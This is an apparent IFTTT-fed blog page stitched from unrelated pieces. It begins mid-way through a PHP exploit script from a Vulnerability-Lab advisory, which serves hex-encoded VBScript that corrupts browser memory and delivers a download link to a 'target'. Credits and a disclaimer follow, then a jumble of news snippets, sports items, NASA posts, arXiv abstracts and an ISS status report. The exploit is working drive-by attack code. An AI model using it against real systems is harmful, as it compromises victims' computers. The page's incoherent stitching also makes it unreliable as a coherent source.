"\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61". "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28". "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29". "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66". "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20". "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d". "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20". "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69". "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20". "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46". "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28". "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20". "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49". "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72". "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a". "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65". "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45". "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20". "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65". "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29". "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20". "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36". "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64". "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d". "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e"; $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?> Security Risk: ============== The security risk of the security vulnerability in the html hta application is estimated as high. (CVSS 9.3) Credits & Authors: ================== Author: Mohammad Reza Espargham Linkedin: http://ift.tt/1TVmT6d E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com Website: www.reza.es Twitter: https://twitter.com/rezesp FaceBook: http://ift.tt/1LkSAOV Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Source: Gmail -> IFTTT-> Blogger

How To Use WhatsApp Web Client on iPhone and Other iOS Devices

WhatsApp Web client support is now available for iOS users. That's right, now iOS users can access their instant messaging facility on the web; without taking the other route (via jailbreaking). Eight months ago, on January 21, 2015, WhatsApp was made available on web browsers, and let Android, Windows Phone 8.0 and 8.1, Nokia S60, Nokia S40 Single SIM EVO, BlackBerry and BB10


from The Hacker News http://ift.tt/1Kxwk1t
via IFTTT

Your GPS Location and Calls Can be Spied Using Network Vulnerability

Yes, you heard it right. It's the dirty truth that’s featuring what is being called the largest privacy breach ever. Billions of cell phone users are at risk of a vulnerability in the SS7 inter-carrier network that allows hackers and spies agencies to track locations and intercept all voice calls from anywhere in the world. This is something we already know from the last year's Snowden


from The Hacker News http://ift.tt/1NnfHLL
via IFTTT

September 28, 2015 Total Lunar Eclipse: Shadow View

On the evening of September 27, 2015 in the Americas (early morning on September 28 in Europe and most of Africa), the Moon enters the Earth's shadow, creating a total lunar eclipse, the last of four visible in the Western Hemisphere in a span of 18 months. This animation shows the changing appearance of the Moon as it travels into and out of the Earth's shadow, along with the times at various stages. Versions of the animation have been created for each of the four time zones of the contiguous United States, as well as one for Universal Time. All of South America and most of North and Central America will see the entire eclipse, while those west of roughly 120°W will see it in progress at moonrise. You won't need special equipment to see it. Just go outside and look up! The penumbra is the part of the Earth's shadow where the Sun is only partially covered by the Earth. The umbra is where the Sun is completely hidden. The Moon's appearance isn't affected much by the penumbra. The real action begins when the Moon starts to disappear as it enters the umbra at about 9:07 Eastern Daylight Time. An hour later, entirely within the umbra, the Moon is a ghostly copper color, and this lasts for over an hour before the Moon begins to emerge from the central shadow. The view in these animations is geocentric. Because of parallax, the Moon's position against the background stars will look a bit different for observers at different locations on the surface of the Earth. The Moon is in the southwestern part of the constellation Pisces.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1JkTpaZ
via IFTTT

Bayern visits Hoffenheim, Dortmind travels to Ingolstadt

FRANKFURT, Germany (AP) One round into the Bundesliga season and the top of the table already looks like it might at the end of the campaign - Bayern Munich in front, Borussia Dortmund right behind.

from FOX Sports Digital http://ift.tt/1TYQyWO
via IFTTT

Chinks in Barca's armor found on eve of Spanish opener

BARCELONA, Spain (AP) For a team that won it all in spectacular fashion last season, Barcelona begins the Spanish league plagued by doubts few could have imagined three months ago.

from FOX Sports Digital http://ift.tt/1TYNtWD
via IFTTT

Awaiting 1st goal of season, Rooney frustrated by critics

LONDON (AP) Manchester United has only played three games this season and Wayne Rooney's inability to score is already under scrutiny.

from FOX Sports Digital http://ift.tt/1TYJLwa
via IFTTT

Quiet offseason in Spain puts coaches in focus

BARCELONA, Spain (AP) After a quiet summer for the Spanish league marked by famous farewells instead of lavish outlays, two coaches could take center stage as Barcelona opens its title defense this weekend with Real Madrid again the main challenger.

from FOX Sports Digital http://ift.tt/1MFmctm
via IFTTT

Meet the NSA's Best Friend in Spying On The Internet

Fed up with the NSA-Snowden updates? Wait a second...there's some more! Back in May 2013, when former NSA employee Edward Snowden leaked classified documents from the U.S. National Security Agency (NSA), we doubted the relationship between NSA and telecommunications giant AT&T. But, now their relationship has been revealed – NSA and AT&T are Best Friends. <!-- adsense --> Yes,


from The Hacker News http://ift.tt/1hrEykI
via IFTTT

Shakhtar's Stepanenko out of hospital following head injury

VIENNA (AP) Shakhtar Donetsk midfielder Taras Stepanenko has been released from hospital and was traveling back to Ukraine with his team on Thursday, a day after hurting his head in a Champions League playoff game at Rapid Vienna.

from FOX Sports Digital http://ift.tt/1UUFpbZ
via IFTTT

Argentina defender Otamendi joins Man City from Valencia

MANCHESTER, England (AP) Nicolas Otamendi has signed for Manchester City from Valencia on a five-year deal, becoming the fourth Argentina international in the squad of the current Premier League leaders.

from FOX Sports Digital http://ift.tt/1PnRx1m
via IFTTT

What You Should Know About The 'Dark Web,'

The appeal of such a network is obvious: Users can remain anonymous if they play their cards right, which means they can exchange sensitive ...

from Google Alert - anonymous http://ift.tt/1UUBxrs
via IFTTT

Web.com Hacked! Credit Card information of 93,000 Customers Compromised

Web.com, a Florida-based web hosting company with up to 3.3 Million customers, has suffered a data breach and may have compromised personal information and credit card data belonging to 93,000 of its clients. The company on Tuesday confirmed that some unknown hackers had breached one of its computer systems on August 13, 2015, and accessed personal information of nearly 93,000 customers.


from The Hacker News http://ift.tt/1K7GNVx
via IFTTT

Central Cygnus Skyscape


In cosmic brush strokes of glowing hydrogen gas, this beautiful skyscape unfolds across the plane of our Milky Way Galaxy and the center of the northern constellation Cygnus the Swan. The featured image spans about six degrees. Bright supergiant star Gamma Cygni (Sadr) to the upper left of the image center lies in the foreground of the complex gas and dust clouds and crowded star fields. Left of Gamma Cygni, shaped like two luminous wings divided by a long dark dust lane is IC 1318, whose popular name is understandably the Butterfly Nebula. The more compact, bright nebula at the lower right is NGC 6888, the Crescent Nebula. Some distance estimates for Gamma Cygni place it at around 1,800 light-years while estimates for IC 1318 and NGC 6888 range from 2,000 to 5,000 light-years. via NASA http://ift.tt/1hLIP2m

ALCOHOLICS ANONYMOUS

ALCOHOLICS ANONYMOUS : If you want to drink, .... ALCOHOLICS ANONYMOUS : ... Travel classified ad of the St. Catharines Standard Classified.

from Google Alert - anonymous http://ift.tt/1TXTVx9
via IFTTT

Kansas City Art Institute Receives $25 Million from Anonymous Donor

The Kansas City Art Institute in Missouri had received a gift of twenty-five million dollars from a donor who has asked to stay anonymous, according to ...

from Google Alert - anonymous http://ift.tt/1WG05Gz
via IFTTT

Wednesday, August 19, 2015

Orioles Highlight: Henry Urrutia's first career HR leading off bottom of 9th gives Baltimore 5-4 win over Mets (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous Webform Results/Submissions for logged in users?

Hello, I am looking for a way to make webform submissions from logged in users anonymous, such that when results are viewed, the users IP email, ...

from Google Alert - anonymous http://ift.tt/1hqJqqt
via IFTTT

US women beat Costa Rica 7-2 in rainy exhibition

CHATTANOOGA, Tenn. (AP) Carli Lloyd and Heather O'Reilly each scored twice and the United States beat Costa Rica 7-2 on Wednesday night in a Women's World Cup victory tour exhibition game that included an 83-minute weather delay.

from FOX Sports Digital http://ift.tt/1LlRBRh
via IFTTT

Anonymous Donor Gives $25 Million to Mo. Art College

The anonymous donation includes a $6-million commitment for a two-for-one match of up to $3 million in additional fundraising by the school for ...

from Google Alert - anonymous http://ift.tt/1E5krTN
via IFTTT

Fishing out Winners from Vote Streams. (arXiv:1508.04522v1 [cs.CC])

We investigate the problem of winner determination from computational social choice theory in the data stream model. Specifically, we consider the task of summarizing an arbitrarily ordered stream of $n$ votes on $m$ candidates into a small space data structure so as to be able to obtain the winner determined by popular voting rules. As we show, finding the exact winner requires storing essentially all the votes. So, we focus on the problem of finding an {\em $\eps$-winner}, a candidate who could win by a change of at most $\eps$ fraction of the votes. We show non-trivial upper and lower bounds on the space complexity of $\eps$-winner determination for several voting rules, including $k$-approval, $k$-veto, scoring rules, approval, maximin, Bucklin, Copeland, and plurality with run off.



from cs.AI updates on arXiv.org http://ift.tt/1Pn6BfQ
via IFTTT

Proposal for the creation of a research facility for the development of the SP machine. (arXiv:1508.04570v1 [cs.AI])

This is a proposal to create a research facility for the development of a high-parallel version of the "SP machine", based on the "SP theory of intelligence". We envisage that the new version of the SP machine will be an open-source software virtual machine, derived from the existing "SP computer model", and hosted on an existing high-performance computer. It will be a means for researchers everywhere to explore what can be done with the system and to create new versions of it. The SP system is a unique attempt to simplify and integrate observations and concepts across artificial intelligence, mainstream computing, mathematics, and human perception and cognition, with information compression as a unifying theme. Potential benefits and applications include helping to solve problems associated with big data; facilitating the development of autonomous robots; unsupervised learning, natural language processing, several kinds of reasoning, fuzzy pattern recognition at multiple levels of abstraction, computer vision, best-match and semantic forms of information retrieval, software engineering, medical diagnosis, simplification of computing systems, and the seamless integration of diverse kinds of knowledge and diverse aspects of intelligence. Additional motivations include the potential of the SP system to help solve problems in defence, security, and the detection and prevention of crime; potential in terms of economic, social, environmental, and academic criteria, and in terms of publicity; and the potential for international influence in research. The main elements of the proposed facility are described, including support for the development of "SP-neural", a neural version of the SP machine. The facility should be permanent in the sense that it should be available for the foreseeable future, and it should be designed to facilitate its use by researchers anywhere in the world.



from cs.AI updates on arXiv.org http://ift.tt/1Pn6CQW
via IFTTT

Drawing and Analyzing Causal DAGs with DAGitty. (arXiv:1508.04633v1 [cs.AI])

DAGitty is a software for drawing and analyzing causal diagrams, also known as directed acyclic graphs (DAGs). Functions include identification of minimal sufficient adjustment sets for estimating causal effects, diagnosis of insufficient or invalid adjustment via the identification of biasing paths, identification of instrumental variables, and derivation of testable implications. DAGitty is provided in the hope that it is useful for researchers and students in Epidemiology, Sociology, Psychology, and other empirical disciplines. The software should run in any web browser that supports modern JavaScript, HTML, and SVG. This is the user manual for DAGitty version 2.3. The manual is updated with every release of a new stable version. DAGitty is available at dagitty.net.



from cs.AI updates on arXiv.org http://ift.tt/1Pn6BfI
via IFTTT

Exploring chance in NCAA basketball. (arXiv:1508.04688v1 [stat.AP])

There seems to be an upper limit to predicting the outcome of matches in (semi-)professional sports. Recent work has proposed that this is due to chance and attempts have been made to simulate the distribution of win percentages to identify the most likely proportion of matches decided by chance. We argue that the approach that has been chosen so far makes some simplifying assumptions that cause its result to be of limited practical value. Instead, we propose to use clustering of statistical team profiles and observed scheduling information to derive limits on the predictive accuracy for particular seasons, which can be used to assess the performance of predictive models on those seasons. We show that the resulting simulated distributions are much closer to the observed distributions and give higher assessments of chance and tighter limits on predictive accuracy.



from cs.AI updates on arXiv.org http://ift.tt/1Pn6BfE
via IFTTT

Traversing Knowledge Graphs in Vector Space. (arXiv:1506.01094v2 [cs.CL] UPDATED)

Path queries on a knowledge graph can be used to answer compositional questions such as "What languages are spoken by people living in Lisbon?". However, knowledge graphs often have missing facts (edges) which disrupts path queries. Recent models for knowledge base completion impute missing facts by embedding knowledge graphs in vector spaces. We show that these models can be recursively applied to answer path queries, but that they suffer from cascading errors. This motivates a new "compositional" training objective, which dramatically improves all models' ability to answer path queries, in some cases more than doubling accuracy. On a standard knowledge base completion task, we also demonstrate that compositional training acts as a novel form of structural regularization, reliably improving performance across all base models (reducing errors by up to 43%) and achieving new state-of-the-art results.



from cs.AI updates on arXiv.org http://ift.tt/1IeAxZ5
via IFTTT

New Limits for Knowledge Compilation and Applications to Exact Model Counting. (arXiv:1506.02639v2 [cs.AI] UPDATED)

We show new limits on the efficiency of using current techniques to make exact probabilistic inference for large classes of natural problems. In particular we show new lower bounds on knowledge compilation to SDD and DNNF forms. We give strong lower bounds on the complexity of SDD representations by relating SDD size to best-partition communication complexity. We use this relationship to prove exponential lower bounds on the SDD size for representing a large class of problems that occur naturally as queries over probabilistic databases. A consequence is that for representing unions of conjunctive queries, SDDs are not qualitatively more concise than OBDDs. We also derive simple examples for which SDDs must be exponentially less concise than FBDDs. Finally, we derive exponential lower bounds on the sizes of DNNF representations using a new quasipolynomial simulation of DNNFs by nondeterministic FBDDs.



from cs.AI updates on arXiv.org http://ift.tt/1JApBrU
via IFTTT

Query-Answer Causality in Databases: Abductive Diagnosis and View-Updates. (arXiv:1506.04299v4 [cs.DB] UPDATED)

Causality has been recently introduced in databases, to model, characterize and possibly compute causes for query results (answers). Connections between query causality and consistency-based diagnosis and database repairs (wrt. integrity constrain violations) have been established in the literature. In this work we establish connections between query causality and abductive diagnosis and the view-update problem. The unveiled relationships allow us to obtain new complexity results for query causality -the main focus of our work- and also for the two other areas.



from cs.AI updates on arXiv.org http://ift.tt/1G9CGBF
via IFTTT

A Survey of Current Datasets for Vision and Language Research. (arXiv:1506.06833v2 [cs.CL] UPDATED)

Integrating vision and language has long been a dream in work on artificial intelligence (AI). In the past two years, we have witnessed an explosion of work that brings together vision and language from images to videos and beyond. The available corpora have played a crucial role in advancing this area of research. In this paper, we propose a set of quality metrics for evaluating and analyzing the vision & language datasets and categorize them accordingly. Our analyses show that the most recent datasets have been using more complex language and more abstract concepts, however, there are different strengths and weaknesses in each.



from cs.AI updates on arXiv.org http://ift.tt/1N7Wnij
via IFTTT

US team honors Chattanooga victims before exhibition game

CHATTANOOGA, Tenn. (AP) The United States' Women's World Cup-winning soccer team honored victims of last month's attacks of two military facilities in Chattanooga before an exhibition match against Costa Rica on Wednesday night.

from FOX Sports Digital http://ift.tt/1TX4qRe
via IFTTT

Lightning delays US women's exhibition with Costa Rica

CHATTANOOGA, Tenn. (AP) Lightning has delayed the U.S. women's soccer team's exhibition game against Costa Rica on Wednesday night.

from FOX Sports Digital http://ift.tt/1TX4qAU
via IFTTT

Shakhtar beats Rapid Vienna 1-0 in Champions League playoff

VIENNA (AP) Shakhtar Donetsk beat Rapid Vienna 1-0 in the first leg of their Champions League playoff Wednesday, positioning itself for reaching the group stage for a sixth straight season.

from FOX Sports Digital http://ift.tt/1MymzVc
via IFTTT

Valencia beats Monaco 3-1 in Champions League playoff

VALENCIA, Spain (AP) Valencia forward Sofiane Feghouli scored after setting up the opener to lead the Spanish club to a 3-1 win over Monaco on Wednesday in the first leg of their Champions League playoff.

from FOX Sports Digital http://ift.tt/1EDevMk
via IFTTT

Marseille appoints Michel Gonzalez as coach

MARSEILLE, France (AP) French club Marseille says it has appointed Michel Gonzalez as its coach.

from FOX Sports Digital http://ift.tt/1TTUFsD
via IFTTT

Newcastle signs winger Florian Thauvin from Marseille

NEWCASTLE, England (AP) Newcastle has signed winger Florian Thauvin from Marseille as the Premier League club's fifth addition of the summer transfer window.

from FOX Sports Digital http://ift.tt/1MDy1QW
via IFTTT

Google Unveils Smart, New OnHub Wi-Fi Router

Don't stare at the screen for too long for the buffering to end, Google has a solution! It seems like Google is buckling up to carve out a niche in the market of wireless smart network devices. Just few days after Google made itself a subsidiary and a separate venture under Alphabet Inc, it announced the news of Android Marshmallow and now ithe company has announced to offer a new way


from The Hacker News http://ift.tt/1PzLw2d
via IFTTT

Germany defender Ruediger leaves Stuttgart to join Roma

STUTTGART, Germany (AP) Germany defender Antonio Ruediger is leaving Bundesliga club Stuttgart to join Roma in Italy's Serie A.

from FOX Sports Digital http://ift.tt/1NuLQ3n
via IFTTT

Apple Mac OS X Hits by Two Unpatched Zero-day Flaws

Few days after Apple patched the DYLD_PRINT_TO_FILE privilege-escalation vulnerability in OS X Yosemite, hackers have their hands on another zero-day bug in its operating system that allows hackers to gain root privileges to Mac computers. Italian teenager Luca Todesco (@qwertyoruiop) has discovered two unknown zero-day vulnerabilities in Apple's Mac OS X operating system that could


from The Hacker News http://ift.tt/1LkYLp4
via IFTTT

I have a new follower on Twitter


Lillian Pierson, PE
Data science consultant, trainer, speaker. Author of Data Science for Dummies.

http://t.co/DA9mNib0c0
Following: 13564 - Followers: 26303

August 19, 2015 at 10:44AM via Twitter http://twitter.com/BigDataGal

ISS Daily Summary Report – 08/18/15

Human Research Program (HRP) Operations: Kelly and Kornienko performed day two of their Flight Day (FD) 150 Ocular Health session.  Kelly completed his Video Walk Through #4 and Observation #11 for Habitability and his second of three weekly Journal activities. Lindgren completed his FD 27 Cognition and Yui completed FD 30 Sprint Ultrasound. Ocular Health: OCT is used to measure retinal thickness, volume, and retinal nerve fiber layer, and the fundoscope is used to obtain images of the retinal surface. Journals obtains information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. Individualized Real-Time Neurocognitive Assessment Toolkit for Space Flight Fatigue (Cognition) is a battery of tests that measures how spaceflight-related physical changes, such as microgravity and lack of sleep, can affect cognitive performance. Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as Near Earth Asteroids (NEA) and Mars. The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Yui configured video, Ultrasound 2 machine, and donned the calf and thigh reference guides.  He then performed thigh and calf scans with guidance from the Sprint ground team.  Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Capillary Effects of Drinking in the Microgravity Environment (Capillary Beverage): Microgravity affects the way fluids behave, and as such, crew members must drink from special sealed bags instead of using straws or normal cups. Capillary Beverage studies the process of drinking from specially designed Space Cups that use fluid dynamics to mimic the effect of gravity. In this instance of Capillary Beverage, Lindgren used Lemon-Lime drink to demonstrate how a complex fluid reacts to the cup’s special designs in an attempt to mimic the gravitational flow of a liquid through capillary forces. NanoRack Cubesat Deployer (NRCSD) #5 Imagery: Kelly retracted the JEM Airlock (JEMAL) Slide Table (ST) into the cabin and took pictures of the NRCSD doors and latch configurations.  The images were downlinked for specialists to evaluate prior to NRCSD #6 activities and the ST was extended back into the JEMAL. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Vertigo: Kelly performed a procedure review and conference with the ground team prior to the SPHERES Vertigo run scheduled for Wednesday. This investigation uses SPHERES free-flying satellites and is designed to demonstrate and test enhanced technologies and techniques related to visual inspection and navigation. This effort incorporates hardware and software that enables multiple SPHERES to construct 3D models of a target object. Additionally, this investigation explores how well the SPHERES free-flyers then perform relative navigation solely by reference to these 3D models. On-Board Training (OBT) Robotics On-Board Trainer (ROBoT): In preparation for capture and berthing of HTV5 currently planned for next Monday, August 24, the crew completed a session of this training where they practiced a 30 meter approach and two Capture Point (CP) hold runs. Today’s Planned Activities All activities were completed unless otherwise noted. Hematocrit. Test Hematocrit Hardware Stowage Verification of anti-virus scan results on Auxiliary Computer System (ВКС) laptops SPHERES – Battery Replacement USND2 – activation of Ultrasound Hardware and Camcorder Swap NINJA password document with new one BLR48 – starting measurement Camcorder Setup to View LAB RWS Monitor 3 SPRINT – Hardware prep and installation Transfer water from Progress 428 (DC1) Rodnik Water Tank БВ2 to SM Rodnik Water Tank 2 SPRINT – Operator HMS – Vision Test ECLSS Recycle Tank Remove and Replace Test activation of Vozdukh Atmosphere Purification System Emergency Vacuum Valves [АВК СОА] SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) Verification of ИП-1 Flow Sensor Position HMS – Vision Questionnaire Transfer water from Progress 428 (DC1) Rodnik Tank БВ2 to SM Rodnik Tank БВ2 – compressor restart Optical Coherence Tomography (OCT) Setup VIBROLAB. Monitoring hardware activation EML – Opening Gas Valves SSIPC Management / ISS Crew Tagup Transfer water from Progress 428 (DC1) Rodnik Tank БВ2 to SM Rodnik Tank БВ2 – compressor restart Health Management System (HMS) – Optical Coherence Tomography (ОСТ) USND2 – Hardware Deactivation and Closeout Ops Filling (separation) of EDV (KOV) for Elektron or EDV-SV SPHERES – File Transfers from USB drive ТКГ 428 (DC1) Rodnik Water Tank Shell Compression СОЖ maintenance SPHERES – Battery Replacement HAM Radio session from Columbus ТК 716 IRIDIUM Phone Charging – Battery Status Check ТК 716 IRIDIUM Phone Charging – Terminate Charge JEM Airlock Slide Table Retraction Laptop RS3 Commanding. Robotic Workstation (RWS) Teardown ТК 717 IRIDIUM Phone Charging – Initiate Charge NRCSD-5 Deployer 2, Photography OCT Exam Charging ТК 717 IRIDIUM Phone – Battery Charge Status Health Management System (HMS) – Optical Coherence Tomography (ОСТ) – Operator RS3 Laptop-КЦП2-ЦВМ-ТВМ Path Command & Data Test.  24-hour ECG Monitoring (termination) Charging ТК 717 IRIDIUM Phone – terminate charge, tear down the setup, closeout ops JEM Airlock Slide Table Retraction 24-hour BP Monitoring (end) CONTUR-2. Hardware Installation on panel 418 Laptop RS3 Commanding. SPHERES – Battery Replacement Swap condensation collection from the Lab Condensate Tank to the Water Processing Assembly (WPA) Waste Water Tank (WW tank) while the Sabatier Jumper is installed WRM. Condensate Pumping Initiation CONTUR-2. Experiment Session Ops. 24-hour ECG Monitoring (start) CAPBEV – Preparation Ops IDENTIFIKATSIYA. Copy ИМУ-Ц micro-accelerometer data to laptop Rodent Research 